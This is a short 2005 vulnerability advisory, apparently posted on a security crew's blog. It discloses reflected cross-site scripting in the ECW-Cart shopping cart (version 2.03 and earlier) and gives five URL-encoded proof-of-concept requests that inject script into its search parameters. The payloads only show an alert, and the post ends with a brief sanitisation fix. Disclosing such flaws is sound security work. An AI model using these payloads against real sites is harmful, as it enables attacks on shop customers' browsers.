by r0t,der4444,cembo,VietMafia

Thursday, December 15, 2005

ECW-Cart XSS vuln.

ECW-Cart XSS vuln.

Vuln. discovered by : r0t
Date: 15 dec. 2005
vendor:www.soft4e.com/cart.html
affected version:2.03 and prior

Product Description:

ECW-Cart - simple for use featured shopping cart with ability to use MS Excel or Access format for database. Users can calculate progressive discount for chosen products list. Search for keywords and prices. Merchant can prepare list of products for on-line selling by using MS Excel or Access, then easy upload prepared database into Web Server via any FTP client. Admin can specify in config file groups of products, order features, discounts for different order prices.

Vuln. Description:


ECW-Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "kword" "max" "min" "comp" "f" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/index.cgi?c=search&s=ok&id=191&kword=
%22%3E%3Cscript%3Ealert%28%27r0t%27%29
%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=
&max=

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=0&min=&max=%22%3E%3Csc
ript%3Ealert%28%27r0t%27%29%3C%2Fscrip
t%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%
3Ealert%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert
%28%27r0t%27%29%3C%2Fscript%3E

/index.cgi?c=search&s=ok&id=191&kword=
&f=%22%3E%3Cscript%3Ealert%28%27r0t%27
%29%3C%2Fscript%3E

Solution:
Edit the source code to ensure that input is properly sanitised.


ps. "r0t+XSS" change to existing paremeter.

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew